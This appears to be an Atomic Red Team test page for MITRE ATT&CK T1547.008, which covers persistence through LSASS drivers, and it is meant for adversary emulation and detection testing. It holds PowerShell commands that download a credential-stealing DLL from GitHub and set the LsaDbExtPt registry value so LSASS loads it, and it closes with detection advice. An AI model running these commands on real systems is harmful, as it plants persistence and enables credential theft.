# T1547.008 - Boot or Logon Autostart Execution: LSASS Driver
Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process.(Citation: Microsoft Security Subsystem)

Adversaries may target LSASS drivers to obtain persistence. By either replacing or adding illegitimate drivers (e.g., [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574)), an adversary can use LSA operations to continuously execute malicious payloads.

## Atomic Tests

### Atomic Test #1 - Modify Registry to load Arbitrary DLL into LSASS - LsaDbExtPt
The following Atomic will modify an undocumented registry key that may be abused to load a arbitrary DLL into LSASS. 

Upon execution, the registry key will be modified and a value will contain the path to the DLL. 
Reference: https://blog.xpnsec.com/exploring-mimikatz-part-1/ and source https://github.com/oxfemale/LogonCredentialsSteal
Note that if any LSA based protection is enabled, this will most likely not be successful with LSASS.exe loading the DLL.

**Supported Platforms:** windows
Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `powershell`!
##### Description: lsass_lib.dll must exist on disk at specified location (#{dll_path})

##### Check Prereq Commands:
```powershell
if (Test-Path $env:TEMP\lsass_lib.dll) {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Invoke-WebRequest "https://github.com/oxfemale/LogonCredentialsSteal/raw/53e74251f397ddeab2bd1348c3ff26d702cfd836/lsass_lib/x64/Release/lsass_lib.dll" -UseBasicParsing -OutFile "$env:TEMP\lsass_lib.dll"

```

In [ ]:
Invoke-AtomicTest T1547.008 -TestNumbers 1 -GetPreReqs

#### Attack Commands: Run with `powershell`
```powershell
New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\NTDS -Name LsaDbExtPt -Value "$env:TEMP\lsass_lib.dll"
```

In [ ]:
Invoke-AtomicTest T1547.008 -TestNumbers 1

## Detection
With LSA Protection enabled, monitor the event logs (Events 3033 and 3063) for failed attempts to load LSA plug-ins and drivers. (Citation: Microsoft LSA Protection Mar 2014) Also monitor DLL load operations in lsass.exe. (Citation: Microsoft DLL Security)

Utilize the Sysinternals Autoruns/Autorunsc utility (Citation: TechNet Autoruns) to examine loaded drivers associated with the LSA. 